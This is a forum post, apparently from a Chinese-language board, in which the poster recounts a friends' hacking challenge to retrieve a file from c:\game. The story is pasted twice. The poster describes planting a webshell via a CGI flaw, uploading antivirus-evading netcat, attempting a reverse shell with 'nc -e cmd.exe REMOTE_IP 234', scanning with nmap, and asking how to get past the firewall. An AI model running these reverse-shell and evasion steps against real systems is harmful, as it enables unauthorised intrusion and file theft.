- 注册
- 2002-10-12
- 消息
- 47,114
- 荣誉分数
- 2,376
- 声望点数
- 393
some friends of mine openned a *h*a*c*k*i*n* challenge
"the quest is to get a file in c:\game"
i created a webshell by using a cgi vulnerability in the forum that they setup on the server.
the i get in there, uploaded netcat[i modified it a little bit so those antivirus programs wont detect it.]
i blind a port on my remote server
nc -l -p 234
then use webshell make a revese connection to the server
nc -e cmd.exe REMOTE_IP 234
it doesn't work out, no incoming connection show on my remote server
i tried to dir c:\, it shows that c: is restricted to iusr_computername
then i uploaded reg.exe from 2000 resource kit tool and psinfo in order to get more information
it clearly shows that service pack is up-to-date
the things begin to make me dizzy
i go back to my remote server
nmap -sS -P0 HOST_IP
couple ports were listed and only 80 www is open for using, the resets are all in filtered mode;(
i was wondering, is there any way to disable the firewall or just simplely grap a list from the c:\game
then pick the file that we are looking for?
ps: after i use net start, only regular services show up. no sign of norton
well i am sure there gotta be some firewall program or the default TCP/IP filtering were be modified[permit 80 TCP only]
"the quest is to get a file in c:\game"
i created a webshell by using a cgi vulnerability in the forum that they setup on the server.
the i get in there, uploaded netcat[i modified it a little bit so those antivirus programs wont detect it.]
i blind a port on my remote server
nc -l -p 234
then use webshell make a revese connection to the server
nc -e cmd.exe REMOTE_IP 234
it doesn't work out, no incoming connection show on my remote server
i tried to dir c:\, it shows that c: is restricted to iusr_computername
then i uploaded reg.exe from 2000 resource kit tool and psinfo in order to get more information
it clearly shows that service pack is up-to-date
the things begin to make me dizzy
i go back to my remote server
nmap -sS -P0 HOST_IP
couple ports were listed and only 80 www is open for using, the resets are all in filtered mode;(
i was wondering, is there any way to disable the firewall or just simplely grap a list from the c:\game
then pick the file that we are looking for?
ps: after i use net start, only regular services show up. no sign of norton
well i am sure there gotta be some firewall program or the default TCP/IP filtering were be modified[permit 80 TCP only]
